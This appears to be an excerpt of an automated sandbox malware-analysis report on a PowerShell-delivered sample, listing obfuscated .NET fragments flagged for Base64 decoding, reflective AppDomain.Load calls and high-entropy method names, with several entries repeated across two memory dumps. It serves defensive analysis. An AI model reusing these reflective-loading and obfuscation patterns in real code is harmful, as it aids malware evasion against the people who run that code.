            Source: Binary string: System.Core.pdb` source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr

            Data Obfuscation

            barindex
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.GkEAxd3nJ5T2No6D7GAPyTu9H2RCHhovmhce8vUtvQRZwS3Llj8PT6QyxoB8ejmDziCHqIJETc8,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._0DtSY0DAdvftfFE2pUuSLnTfHqIJzYq6DkKj7o2H1UhyfuKOT9OoONpBct4AEPnNiLvJwXthHl1,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._6rmQnBxYz9wFjXeTkpWUZeLOu39HgSUqZd71j1za1gv5xaKy4Tw5vv0iULTi38ZgN6lxg4rgfwl,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.hQAzsDTmejtRzFTAGYZ9JLeR7bLH9yKFQ8A2gM6qfonXx3k8I99ygySzYyrHqAscPInDM6HYvbS,UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.xRBnfzrwWduwbc5XTg9GoORqm0jrxu8hsNXppUjoIbTyMyOoWfQiJYASUrhx9r5waTu9nCfcEhqJO()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[2],UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.JF9XD3PKLzllq7mNRKeF2ZEh4ezaBNAJbPZaWmOdDth4i0epPbsZqo1dmRi2God1jSSCOTuXb9M1p(Convert.FromBase64String(WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.GkEAxd3nJ5T2No6D7GAPyTu9H2RCHhovmhce8vUtvQRZwS3Llj8PT6QyxoB8ejmDziCHqIJETc8,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._0DtSY0DAdvftfFE2pUuSLnTfHqIJzYq6DkKj7o2H1UhyfuKOT9OoONpBct4AEPnNiLvJwXthHl1,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._6rmQnBxYz9wFjXeTkpWUZeLOu39HgSUqZd71j1za1gv5xaKy4Tw5vv0iULTi38ZgN6lxg4rgfwl,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.hQAzsDTmejtRzFTAGYZ9JLeR7bLH9yKFQ8A2gM6qfonXx3k8I99ygySzYyrHqAscPInDM6HYvbS,UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.xRBnfzrwWduwbc5XTg9GoORqm0jrxu8hsNXppUjoIbTyMyOoWfQiJYASUrhx9r5waTu9nCfcEhqJO()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[2],UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.JF9XD3PKLzllq7mNRKeF2ZEh4ezaBNAJbPZaWmOdDth4i0epPbsZqo1dmRi2God1jSSCOTuXb9M1p(Convert.FromBase64String(WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F35801 push E95D70D4h; ret 0_2_00007FF848F35829
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01508080 push eax; iretd 3_2_01508081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01504CC8 pushad ; retf 3_2_01504CD1
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, jlP9ZmdwEcSal0DicgRXsFBAsRfalWtK8ACjZN20FmtLoweURb4IYXHMKD2jaT0u384K7iAfr5Cnm.csHigh entropy of concatenated method names: '_3TNqZ5hEQVdooCaFVGMhOACTkYaCnTtbNyPGedVllTTfJY1ngUvGia8lhIVPmVUfboypRhwske82g', '_9hHmMsNWAQ6pax4hFZSp7KQG0rewoH7osRvhlI61xGEa9wmvjJneedEBnJlIm8ZEnxTWhRNJPkX6Y', '_49h5GNrcmqMaLuCg35WCTCs0h7BKuHAJaBowmRkClgoGOAsQ5inXYS1I0M7Z4aMeT3m9F31FvkW4S', 'PaOgG4FwzNenoLAMiHTHwPqA01MCJnbz4LPDBsbvSv1JUtf62uk5cC2FEJF1ahKJztdhgk', 'eyvfhsKHdxCVDDLO16w9bGJuDfMJixaw3yryvgfDvZpwSeF25JUC5FWDVzeVdYdoClck1f', 'J8aYoV2Df2dibOrCy3jWkKuxTQGwmadjsTkX0of9qc6qZW1dbylXmhbywydmt9LWAvlhFE', 'RQjJNYKDaRYNkmSSONuq1KvQn8xVeEqpZ43P9vqgNRXMzA99C74pQ7u867FKwVkSrz512z', 'Kr3d4jpdx7Aj5Es33qJdyZ5zLAZ6Oqexmh8VHGcQerW9335ONRoGZWlPv97IHMf5QLBSso', 'NHGZCbXPEwk9PdNJ2mCxrW7xUVF0RMDcuQdhPHTWzD89zg7tMv21UaWUF3nSJoDCbShLB8', 'URJnOTwGHUXQHGoqlnefuWqngz1MSskFe5rCHVNBGx1XVNP7QkTB4aFbYXZsWy4Hcgtyg7'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.csHigh entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csHigh entropy of concatenated method names: 'uLcpjPuRlAYcVXjFYFmtEmE6IG3WW1Mtzr0RIFk9A9EyQrTvzKXXIVg2Kl9aPa4ZUwxDazhSAPcV9OBgEpQgQkmuIDh4', 'YKbSLHwMqgcS2pKolhOEHj3xgyFveKjEKCcidxigp4U5yTh4YfVyGzBJwlJcnpP19L9VroiHmlyJuG3idLBl3mCSn6Mm', 'zp4H0yQ0UehqO8XjWJBobcRnUXHtBNNdOJraqUqF18ZXk1TLUu8ITK9oxZPMDksn0W1Pa1Zafu97BPz21DtkMiy8OqlZ', 'acNGsDNjWVethdtOAHfS5bGCQjlG6rRtvqD0T5njuLJ25Dych7HkSrtJugHPYU1sEidvPQu9DNCndDlA1BwGcgqQOkza', 'EYijaGNCTZA5ssmfCphcWBaQGPjJhnvrfOYStXrbSHqI8vBOIvDeyI1zMKU0GLeIXfA35yHnFGzkvaEC5O96miFuyOQc', 'U97RvjaNCYtJiiNUnqYFKh9zn8xByBKWBrFUlgNNn3Y9kt6515ldQ6O97fXLCplKOYUDnKrYZHyKp20hGPYqLPGP43to', 'R5jVmcwmbdTygVF5mseYL7gR5WlhWpIX0SdRUW8f8j2wtWOjloLyaqtkDxKHgIKQPDNnccnKif6EDZ9Yo6kg1mpXNGdk', 'Qg4y4yWaLZe8ShxzIYTJF2jveZABfiLw14cUW2R4nubmT4B60JE6aFHCnRFHd6P1uknuuQS91W4dkE081WxvGjwhal6H', '_5Dw5lOtBWWVVZmthJsMhPC9cUzM5iN8pVJpzSBUee0S2ugQkSBULaRMjDDzaJSKNWwNUaDj8vvXM5hobP13i5jQnjnBo', 'C6Cvo3FCCkFc54Z203lOyD77mYeTf2u9XT2Fg9R2Ovlu8bqQgixOWFkdCS1Rv8ce5gNSQhYPH0Rte8KRxk0sprhtBDOD'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, KqM7OHZ0szpXMKUjIeoOth6ym1BTJiUrVDaPclVtZntCve6UTLSqTCZXaNVMStUq6wiimQow3L7sbJOInc0XhfKzEm5y.csHigh entropy of concatenated method names: 'vlT8dwXrYPa88X2PCSTl1MzL1hOXuK3SZzQ1IazokTftenOcdNLZ16Tqdw7yu5ANElYZlWxgwhbSblLDgcDV4JQrQgpG', 'Yri9DO8KJSBPdGKWv6rruFnfPHpprBjidMFUJ', 'ihN7Vn5g9RpbzGgZUePo8B2niWfMdhDAfds47', 'dvL73CjsvtRpTg2h7knB3tzBhCT55MED4VzHf', 'wdniSU5EpAhXrItpr3nizrrDSwO3uC8vl3Kj9'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, HSVnbciCbEspA5qeJHR9bJSsZnPWuo0GrZXu7MR1gBQLksXwzFXzWWgcApgGUgNKiWg0pwlEuNF.csHigh entropy of concatenated method names: '_2q4wpPRfaVhr0exnXH7y891APAO7HbKET96GKYxGsofSr6nSYQvElSnVQzd4FzDKrH30YbalY8L', 'aWKN8JgTw7OsnLqijS1G2FSf5lKyN1BzTceUS7AusrlZE4LOpgaXcu1Wuwzk1u0fNisdvfs1qDN', 'FJHVAMux3eOse32NPNrYghB0J9OilS0b1VXxCJDJh6FXmI8aBAEjaNpxaC2kopUIxwHOIGv955L', 'jGfRxrKXNpeTM8YO7QPoRJmjQ2fPzxvsBjNLD', 'kZ9PmGZma9rdlqmPKpJGfpPr2H3r8JkUX7S1I', 'AQhlQ1kzIc9Ef2keyCUXapmb3OGi6FTBB2Kva', 'bwp4xqBSAhOIzAidlh3oJJvRivoyrO2AeizFi', 't4NvZMrcVrH5QwGjkdYgS8T6KKd876mvUUikN', 'THXyLh0AdRiaDLkYYQVt4gIf6aGSl2TGIZ0Hv', 'AT1vYmitOvIzOWbQZzZiuTU12J3PiZKXYnxiA'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.csHigh entropy of concatenated method names: 'QVEVDhViI9Msxtf3rvGnQiMgFCItcS0p5D6Z1BTCpo5f6Fde2LisyMtpWmRG', 'N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi', '_1lKSstulGZhXYINkaQd9Asdnrsvcni39pRvUFDpwycuW4xpMqX4hS77iXc6K', 'PNFvO7d1Mi2IWzxMtx1zqm34FyxGrUWwyLxwiGmyaWGVEehy9D6hxvHM1wdE', 'NzfmYhAUGceMKW0mjLzHPddnDgqRRmTH0j9pDfOYWD2DRetXvurMj6Mnbf7d', 'xt4khGVNTHDEWpsI1gYgYvoJk7rms4Vqp4A1OuJJVHK8d5oZr1gtEs3Mjthp', 'zmLy2I6ntM2aqhLCLWxvECHOzvQIBQMbMZRkop6htT9CZiCpf1AwaOdoxGnL', 'lGU48PAY736gsQX2viMog6499aYSQjosLWQRnL6JHFF67P95LEO7pVqTOpjP', 'tWcbDFC14xGh0OYdfNzCiUkAdgC4GkZEk3fcvvyC27fsgUEboKucKM0JQCNsUm0dx4Ht2O9GEH5iHMX42Oi6Tya6c44Z', '_74dfJY6UAxv3WrBFrcQeFUKJoMxCX21o0QCYxD66ZQnhM3Ecq9rhBxcB8PaVyrqjY8AQ0yV0nFGhMbW1o118n5tdEMW0'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.csHigh entropy of concatenated method names: 'MqoWDQphzr8fvnkIH9zEEDcDy7t0zalckB2FahnIxepzgPAMJUZvXj5AyxTxgsTptxlaeKuQhZNQ652tx2KfrWb4jegt', '_39p79IiNTKU0DvuMDijBA51wmgQCy8uNaqsmM', 'VTi9WoIpssJGUPzXMbuMCGF0hZYIeuMphrb9F', 'iVslLiCsMBZl1LzuhzFMYBpuQXVYU9MiwNoac', 'Tmceex3fvKsJkAkUdbAOatlNKDEvt7aWE2OZV'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csHigh entropy of concatenated method names: 'czdLIkkJGHePbv60eOuYeyQebTWkxLQxtIBDozzTkzeHjwvF0iZ9WLXSXldzQJva2vLFfWmskZn', 'j4gQD94PHOIvfqwgF8eMCnFm32o0IB5Ap5qxVVZaFRLKmaLwc0kz81j2suIyuSG55aCfkON107y', 'K6lV2zL7a7baiNZWYLV0Pa7uhSeNElH68zllWH3k55hqCfKpRoNiazcpVFJa', '_3pqyNrhtv7CmhWTfIKaVxCTfMxlC4kt3daOpdYBPiciiKcXwK1tRoUER3QN3', 'jxIHzBWZPIwWF5Me16RXKy5D4q8hbHjIdITEMMSQOScHVlETgFjWzxFrMe5o', 'rgHuZwYDAVkDNu5fiQGgpbr60XJ1IwMKjiCWFJ4F1RAlRxZyaVrVBTTv5GYA', 'zv9n71pQ0f50PGPzTuOQ3EzQE9qjMl5Z2yV4UK950JFaZNBxHTG4HgTd1jZ6', '_5jeSQ3EJhe2fy9ifCjr5hanazmLriQS1eJsXevXq9vWo9BtzOTy0qlNTrwXI', 'yDpWKuZ7sOl8dZSwzdYBzBedzlS61vlzsjKG7qtZRtuBOZBV1zTFKonJ80td', '_4QkPUIxQHkmMssVmBG2fIN5OOjEuP5kl4bcy3jjLl4JdQehPZIYuCigGsUp8'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, jlP9ZmdwEcSal0DicgRXsFBAsRfalWtK8ACjZN20FmtLoweURb4IYXHMKD2jaT0u384K7iAfr5Cnm.csHigh entropy of concatenated method names: '_3TNqZ5hEQVdooCaFVGMhOACTkYaCnTtbNyPGedVllTTfJY1ngUvGia8lhIVPmVUfboypRhwske82g', '_9hHmMsNWAQ6pax4hFZSp7KQG0rewoH7osRvhlI61xGEa9wmvjJneedEBnJlIm8ZEnxTWhRNJPkX6Y', '_49h5GNrcmqMaLuCg35WCTCs0h7BKuHAJaBowmRkClgoGOAsQ5inXYS1I0M7Z4aMeT3m9F31FvkW4S', 'PaOgG4FwzNenoLAMiHTHwPqA01MCJnbz4LPDBsbvSv1JUtf62uk5cC2FEJF1ahKJztdhgk', 'eyvfhsKHdxCVDDLO16w9bGJuDfMJixaw3yryvgfDvZpwSeF25JUC5FWDVzeVdYdoClck1f', 'J8aYoV2Df2dibOrCy3jWkKuxTQGwmadjsTkX0of9qc6qZW1dbylXmhbywydmt9LWAvlhFE', 'RQjJNYKDaRYNkmSSONuq1KvQn8xVeEqpZ43P9vqgNRXMzA99C74pQ7u867FKwVkSrz512z', 'Kr3d4jpdx7Aj5Es33qJdyZ5zLAZ6Oqexmh8VHGcQerW9335ONRoGZWlPv97IHMf5QLBSso', 'NHGZCbXPEwk9PdNJ2mCxrW7xUVF0RMDcuQdhPHTWzD89zg7tMv21UaWUF3nSJoDCbShLB8', 'URJnOTwGHUXQHGoqlnefuWqngz1MSskFe5rCHVNBGx1XVNP7QkTB4aFbYXZsWy4Hcgtyg7'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.csHigh entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csHigh entropy of concatenated method names: 'uLcpjPuRlAYcVXjFYFmtEmE6IG3WW1Mtzr0RIFk9A9EyQrTvzKXXIVg2Kl9aPa4ZUwxDazhSAPcV9OBgEpQgQkmuIDh4', 'YKbSLHwMqgcS2pKolhOEHj3xgyFveKjEKCcidxigp4U5yTh4YfVyGzBJwlJcnpP19L9VroiHmlyJuG3idLBl3mCSn6Mm', 'zp4H0yQ0UehqO8XjWJBobcRnUXHtBNNdOJraqUqF18ZXk1TLUu8ITK9oxZPMDksn0W1Pa1Zafu97BPz21DtkMiy8OqlZ', 'acNGsDNjWVethdtOAHfS5bGCQjlG6rRtvqD0T5njuLJ25Dych7HkSrtJugHPYU1sEidvPQu9DNCndDlA1BwGcgqQOkza', 'EYijaGNCTZA5ssmfCphcWBaQGPjJhnvrfOYStXrbSHqI8vBOIvDeyI1zMKU0GLeIXfA35yHnFGzkvaEC5O96miFuyOQc', 'U97RvjaNCYtJiiNUnqYFKh9zn8xByBKWBrFUlgNNn3Y9kt6515ldQ6O97fXLCplKOYUDnKrYZHyKp20hGPYqLPGP43to', 'R5jVmcwmbdTygVF5mseYL7gR5WlhWpIX0SdRUW8f8j2wtWOjloLyaqtkDxKHgIKQPDNnccnKif6EDZ9Yo6kg1mpXNGdk', 'Qg4y4yWaLZe8ShxzIYTJF2jveZABfiLw14cUW2R4nubmT4B60JE6aFHCnRFHd6P1uknuuQS91W4dkE081WxvGjwhal6H', '_5Dw5lOtBWWVVZmthJsMhPC9cUzM5iN8pVJpzSBUee0S2ugQkSBULaRMjDDzaJSKNWwNUaDj8vvXM5hobP13i5jQnjnBo', 'C6Cvo3FCCkFc54Z203lOyD77mYeTf2u9XT2Fg9R2Ovlu8bqQgixOWFkdCS1Rv8ce5gNSQhYPH0Rte8KRxk0sprhtBDOD'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, KqM7OHZ0szpXMKUjIeoOth6ym1BTJiUrVDaPclVtZntCve6UTLSqTCZXaNVMStUq6wiimQow3L7sbJOInc0XhfKzEm5y.csHigh entropy of concatenated method names: 'vlT8dwXrYPa88X2PCSTl1MzL1hOXuK3SZzQ1IazokTftenOcdNLZ16Tqdw7yu5ANElYZlWxgwhbSblLDgcDV4JQrQgpG', 'Yri9DO8KJSBPdGKWv6rruFnfPHpprBjidMFUJ', 'ihN7Vn5g9RpbzGgZUePo8B2niWfMdhDAfds47', 'dvL73CjsvtRpTg2h7knB3tzBhCT55MED4VzHf', 'wdniSU5EpAhXrItpr3nizrrDSwO3uC8vl3Kj9'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, HSVnbciCbEspA5qeJHR9bJSsZnPWuo0GrZXu7MR1gBQLksXwzFXzWWgcApgGUgNKiWg0pwlEuNF.csHigh entropy of concatenated method names: '_2q4wpPRfaVhr0exnXH7y891APAO7HbKET96GKYxGsofSr6nSYQvElSnVQzd4FzDKrH30YbalY8L', 'aWKN8JgTw7OsnLqijS1G2FSf5lKyN1BzTceUS7AusrlZE4LOpgaXcu1Wuwzk1u0fNisdvfs1qDN', 'FJHVAMux3eOse32NPNrYghB0J9OilS0b1VXxCJDJh6FXmI8aBAEjaNpxaC2kopUIxwHOIGv955L', 'jGfRxrKXNpeTM8YO7QPoRJmjQ2fPzxvsBjNLD', 'kZ9PmGZma9rdlqmPKpJGfpPr2H3r8JkUX7S1I', 'AQhlQ1kzIc9Ef2keyCUXapmb3OGi6FTBB2Kva', 'bwp4xqBSAhOIzAidlh3oJJvRivoyrO2AeizFi', 't4NvZMrcVrH5QwGjkdYgS8T6KKd876mvUUikN', 'THXyLh0AdRiaDLkYYQVt4gIf6aGSl2TGIZ0Hv', 'AT1vYmitOvIzOWbQZzZiuTU12J3PiZKXYnxiA'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.csHigh entropy of concatenated method names: 'QVEVDhViI9Msxtf3rvGnQiMgFCItcS0p5D6Z1BTCpo5f6Fde2LisyMtpWmRG', 'N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi', '_1lKSstulGZhXYINkaQd9Asdnrsvcni39pRvUFDpwycuW4xpMqX4hS77iXc6K', 'PNFvO7d1Mi2IWzxMtx1zqm34FyxGrUWwyLxwiGmyaWGVEehy9D6hxvHM1wdE', 'NzfmYhAUGceMKW0mjLzHPddnDgqRRmTH0j9pDfOYWD2DRetXvurMj6Mnbf7d', 'xt4khGVNTHDEWpsI1gYgYvoJk7rms4Vqp4A1OuJJVHK8d5oZr1gtEs3Mjthp', 'zmLy2I6ntM2aqhLCLWxvECHOzvQIBQMbMZRkop6htT9CZiCpf1AwaOdoxGnL', 'lGU48PAY736gsQX2viMog6499aYSQjosLWQRnL6JHFF67P95LEO7pVqTOpjP', 'tWcbDFC14xGh0OYdfNzCiUkAdgC4GkZEk3fcvvyC27fsgUEboKucKM0JQCNsUm0dx4Ht2O9GEH5iHMX42Oi6Tya6c44Z', '_74dfJY6UAxv3WrBFrcQeFUKJoMxCX21o0QCYxD66ZQnhM3Ecq9rhBxcB8PaVyrqjY8AQ0yV0nFGhMbW1o118n5tdEMW0'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.csHigh entropy of concatenated method names: 'MqoWDQphzr8fvnkIH9zEEDcDy7t0zalckB2FahnIxepzgPAMJUZvXj5AyxTxgsTptxlaeKuQhZNQ652tx2KfrWb4jegt', '_39p79IiNTKU0DvuMDijBA51wmgQCy8uNaqsmM', 'VTi9WoIpssJGUPzXMbuMCGF0hZYIeuMphrb9F', 'iVslLiCsMBZl1LzuhzFMYBpuQXVYU9MiwNoac', 'Tmceex3fvKsJkAkUdbAOatlNKDEvt7aWE2OZV'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csHigh entropy of concatenated method names: 'czdLIkkJGHePbv60eOuYeyQebTWkxLQxtIBDozzTkzeHjwvF0iZ9WLXSXldzQJva2vLFfWmskZn', 'j4gQD94PHOIvfqwgF8eMCnFm32o0IB5Ap5qxVVZaFRLKmaLwc0kz81j2suIyuSG55aCfkON107y', 'K6lV2zL7a7baiNZWYLV0Pa7uhSeNElH68zllWH3k55hqCfKpRoNiazcpVFJa', '_3pqyNrhtv7CmhWTfIKaVxCTfMxlC4kt3daOpdYBPiciiKcXwK1tRoUER3QN3', 'jxIHzBWZPIwWF5Me16RXKy5D4q8hbHjIdITEMMSQOScHVlETgFjWzxFrMe5o', 'rgHuZwYDAVkDNu5fiQGgpbr60XJ1IwMKjiCWFJ4F1RAlRxZyaVrVBTTv5GYA', 'zv9n71pQ0f50PGPzTuOQ3EzQE9qjMl5Z2yV4UK950JFaZNBxHTG4HgTd1jZ6', '_5jeSQ3EJhe2fy9ifCjr5hanazmLriQS1eJsXevXq9vWo9BtzOTy0qlNTrwXI', 'yDpWKuZ7sOl8dZSwzdYBzBedzlS61vlzsjKG7qtZRtuBOZBV1zTFKonJ80td', '_4QkPUIxQHkmMssVmBG2fIN5OOjEuP5kl4bcy3jjLl4JdQehPZIYuCigGsUp8'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
